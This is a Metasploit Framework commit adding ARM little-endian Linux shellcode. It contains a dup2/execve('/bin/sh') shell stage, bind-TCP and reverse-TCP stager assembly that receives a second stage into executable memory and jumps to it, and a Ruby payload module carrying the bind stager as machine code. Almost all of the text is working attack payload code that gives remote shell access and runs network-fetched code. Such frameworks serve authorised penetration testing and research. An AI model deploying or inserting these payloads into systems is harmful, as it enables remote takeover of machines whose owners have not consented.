Land rapid7#1879, @dcbz ARM stagers

Author: jvazquez-r7

external/source/shellcode/linux/armle/stage_shell.s

@@ -0,0 +1,34 @@
+@@
+@
+@        Name: generic
+@   Qualities: -
+@     Authors: nemo <nemo [at] felinemenace.org>
+@     License: MSF_LICENSE
+@ Description:
+@
+@        dup2 / execve("/bin/sh") stage for Linux ARM LE architecture.
+@@
+
+.text
+.globl _start
+_start:
+int dup2(int oldfd, int newfd);
+	mov r7,#63       ; __NR_dup2
+	mov r1,#3
+up:
+	mov r0,r12       ; oldfd (descriptor stored in r12 by the stager)
+	sub r1,#1        ; newfd
+	swi 0
+	cmp r1,#1
+	bge up
+@ execve(const char *path, char *const argv[], char *const envp[]);
+	mov r7,#11       ; __NR_execve
+	add r0,pc,#24    ; *path
+	sub sp,#24
+	str r0,[sp,#-20]
+	mov r2,#0
+	str r2,[sp,#-16] 	
+	add r1,sp,#-20   ; *argv[]
+	mov r2,r1        ; *envp[]
+	swi 0
+.string "/bin/sh"

external/source/shellcode/linux/armle/stager_sock_bind.s

@@ -0,0 +1,101 @@
+@@
+@
+@        Name: stager_sock_bind
+@   Qualities: -
+@     Authors: nemo <nemo [at] felinemenace.org>
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux portbind TCP stager for ARM LE architecture.
+@
+@        Socket descriptor in r12.
+@
+@        Assemble with: as stager_sock_bind.s -o stager_sock_bind.o
+@        Link with:     ld stager_sock_bind.o -o stager_sock_bind
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Bind TCP Stager
+@ meta-description=Listen on a port for a connection and run a second stage
+@ meta-authors=nemo <nemo [at] felinemenace.org>
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=stager
+@ meta-connection-type=bind
+@ meta-name=bind_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+	ldr r7,=281        @ __NR_socket
+    mov r0,#2          @ domain   = AF_INET
+	mov r1,#1          @ type     = SOCK_STREAM
+	mov r2,#6          @ protocol = IPPROTO_TCP
+	swi 0
+@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+    mov r12,r0         @ sockfd
+	add r7,#1          @ __NR_bind
+	add r1,pc,#176     @ *addr
+	mov r2,#16         @ addrlen
+	swi 0
+@ int listen(int sockfd, int backlog);
+	add r7,#2          @ __NR_listen
+	mov r0,r12         @ sockfd
+	swi 0
+@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+	add r7,#1          @ __NR_accept
+	mov r0,r12         @ sockfd
+	sub r1,r1,r1       @ *addr    = NULL
+	mov r2,r1          @ *addrlen = NULL
+	swi 0
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+    mov r12,r0         @ sockfd
+	sub sp,#4
+	add r7,#6          @ __NR_recv
+	mov r1,sp          @ *buf (on the stack)
+	mov r2,#4          @ len
+	mov r3,#0          @ flags
+	swi 0
+@ round length
+	ldr r1,[sp,#0]
+	ldr r3,=0xfffff000
+	and r1,r1,r3
+	mov r2,#1
+	lsl r2,#12
+@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
+	add r1,r2          @ length
+	mov r7, #192       @ __NR_mmap2
+	ldr r0,=0xffffffff @ *addr = NULL
+    mov r2,#7          @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
+    ldr r3,=0x1022     @ flags = MAP_ANON | MAP_PRIVATE
+	mov r4,r0          @ fd
+	mov r5,#0          @ pgoffset
+	swi 0
+@ recv loop
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+	add r7,#99         @ __NR_recv
+	mov r1,r0          @ *buf
+	mov r0,r12         @ sockfd
+	mov r3,#0          @ flags
+@ remove blocksize from total length
+loop:
+	ldr r2,[sp,#0]
+	sub r2,#1000
+	str r2,[sp,#0]
+	cmp r2, #0
+	ble last
+	mov r2,#1000       @ len
+	swi 0	
+	b loop
+last:
+	add r2,#1000       @ len
+	swi 0
+@ branch to code
+	mov pc,r1
+@ addr
+@ port: 4444 , sin_fam = 2
+.word   0x5c110002 
+@ ip
+.word   0x00000000 

external/source/shellcode/linux/armle/stager_sock_reverse.s

@@ -0,0 +1,92 @@
+@@
+@
+@        Name: stager_sock_reverse
+@   Qualities: -
+@     Authors: nemo <nemo [at] felinemenace.org>
+@     License: MSF_LICENSE
+@ Description:
+@
+@        Implementation of a Linux reverse TCP stager for ARM LE architecture.
+@
+@        Socket descriptor in r12.
+@
+@        Assemble with: as stager_sock_reverse.s -o stager_sock_reverse.o
+@        Link with:     ld stager_sock_reverse.o -o stager_sock_reverse
+@
+@ Meta-Information:
+@
+@ meta-shortname=Linux Reverse TCP Stager
+@ meta-description=Connect back to the framework and run a second stage
+@ meta-authors=nemo <nemo [at] felinemenace.org>
+@ meta-os=linux
+@ meta-arch=armle
+@ meta-category=stager
+@ meta-connection-type=reverse
+@ meta-name=reverse_tcp
+@@
+
+.text
+.globl _start
+_start:
+@ int socket(int domain, int type, int protocol);
+	ldr r7,=281        @ __NR_socket
+	mov r0,#2          @ domain   = AF_INET
+	mov r1,#1          @ type     = SOCK_STREAM
+	mov r2,#6          @ protocol = IPPROTO_TCP
+	swi 0
+@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+    mov r12,r0         @ sockfd
+	add r7,#2          @ __NR_socket
+	add r1,pc,#144     @ *addr
+	mov r2,#16         @ addrlen
+	swi 0
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+    mov r0,r12         @ sockfd
+	sub sp,#4
+	add r7,#8          @ __NR_recv
+	mov r1,sp          @ *buf (on the stack)
+	mov r2,#4          @ len
+	mov r3,#0          @ flags
+	swi 0
+@ round length
+	ldr r1,[sp,#0]
+	ldr r3,=0xfffff000
+	and r1,r1,r3
+	mov r2,#1
+	lsl r2,#12
+@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
+	add r1,r2          @ length
+	mov r7, #192       @ __NR_mmap2
+	ldr r0,=0xffffffff @ *addr = NULL
+	mov r2,#7          @ prot  = PROT_READ | PROT_WRITE | PROT_EXEC
+    ldr r3,=0x1022     @ flags = MAP_ANON | MAP_PRIVATE
+	mov r4,r0          @ fd
+	mov r5,#0          @ pgoffset
+	swi 0
+@ recv loop
+@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
+	add r7,#99         @ __NR_recv
+	mov r1,r0          @ *buf
+	mov r0,r12         @ sockfd
+	mov r3,#0          @ flags
+@ remove blocksize from total length
+loop:
+	ldr r2,[sp,#0]
+	sub r2,#1000
+	str r2,[sp,#0]
+	cmp r2, #0
+	ble last
+	mov r2,#1000       @ len
+	swi 0	
+	b loop
+last:
+	add r2,#1000       @ len
+	swi 0
+@ branch to code
+	mov pc,r1
+@ addr
+@ port: 4444 , sin_fam = 2
+.word   0x5c110002 
+@ ip: 127.0.0.1
+.word   0x01aca8c0
+@.word   0x0100007f

modules/payloads/stagers/linux/armle/bind_tcp.rb

@@ -0,0 +1,120 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+
+###
+#
+# BindTcp
+# -------
+#
+# Linux bind TCP stager.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Stager
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Bind TCP Stager',
+			'Description'   => 'Listen for a connection',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_ARMLE,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 226, 'n'    ],
+						},
+					'Payload' =>
+					[
+						0xe59f70d4,           # ldr     r7, [pc, #212]
+						0xe3a00002,           # mov     r0, #2
+						0xe3a01001,           # mov     r1, #1
+						0xe3a02006,           # mov     r2, #6
+						0xef000000,           # svc     0x00000000
+						0xe1a0c000,           # mov     ip, r0
+						0xe2877001,           # add     r7, r7, #1
+						0xe28f10b0,           # add     r1, pc, #176
+						0xe3a02010,           # mov     r2, #16
+						0xef000000,           # svc     0x00000000
+						0xe2877002,           # add     r7, r7, #2
+						0xe1a0000c,           # mov     r0, ip
+						0xef000000,           # svc     0x00000000
+						0xe2877001,           # add     r7, r7, #1
+						0xe1a0000c,           # mov     r0, ip
+						0xe0411001,           # sub     r1, r1, r1
+						0xe1a02001,           # mov     r2, r1
+						0xef000000,           # svc     0x00000000
+						0xe1a0c000,           # mov     ip, r0
+						0xe24dd004,           # sub     sp, sp, #4
+						0xe2877006,           # add     r7, r7, #6
+						0xe1a0100d,           # mov     r1, sp
+						0xe3a02004,           # mov     r2, #4
+						0xe3a03000,           # mov     r3, #0
+						0xef000000,           # svc     0x00000000
+						0xe59d1000,           # ldr     r1, [sp]
+						0xe59f3070,           # ldr     r3, [pc, #112]
+						0xe0011003,           # and     r1, r1, r3
+						0xe3a02001,           # mov     r2, #1
+						0xe1a02602,           # lsl     r2, r2, #12
+						0xe0811002,           # add     r1, r1, r2
+						0xe3a070c0,           # mov     r7, #192
+						0xe3e00000,           # mvn     r0, #0
+						0xe3a02007,           # mov     r2, #7
+						0xe59f3054,           # ldr     r3, [pc, #84]
+						0xe1a04000,           # mov     r4, r0
+						0xe3a05000,           # mov     r5, #0
+						0xef000000,           # svc     0x00000000
+						0xe2877063,           # add     r7, r7, #99
+						0xe1a01000,           # mov     r1, r0
+						0xe1a0000c,           # mov     r0, ip
+						0xe3a03000,           # mov     r3, #0
+						0xe59d2000,           # ldr     r2, [sp]
+						0xe2422ffa,           # sub     r2, r2, #1000
+						0xe58d2000,           # str     r2, [sp]
+						0xe3520000,           # cmp     r2, #0
+						0xda000002,           # ble     811c <last>
+						0xe3a02ffa,           # mov     r2, #1000
+						0xef000000,           # svc     0x00000000
+						0xeafffff7,           # b       80fc <loop>
+						0xe2822ffa,           # add     r2, r2, #1000
+						0xef000000,           # svc     0x00000000
+						0xe1a0f001,           # mov     pc, r1
+						0x5c110002,           # .word   0x5c110002
+						0x00000000,           # .word   0x00000000
+						0x00000119,           # .word   0x00000119
+						0xfffff000,           # .word   0xfffff000
+						0x00001022            # .word   0x00001022
+					].pack("V*")
+
+				}
+			))
+	end
+
+	def handle_intermediate_stage(conn, payload)
+
+		print_status("Transmitting stage length value...(#{payload.length} bytes)")
+
+		address_format = 'v'
+
+		# Transmit our intermediate stager
+		conn.put( [ payload.length ].pack(address_format) )
+
+		Rex::ThreadSafe.sleep(0.5)
+
+		return true
+	end
+
+end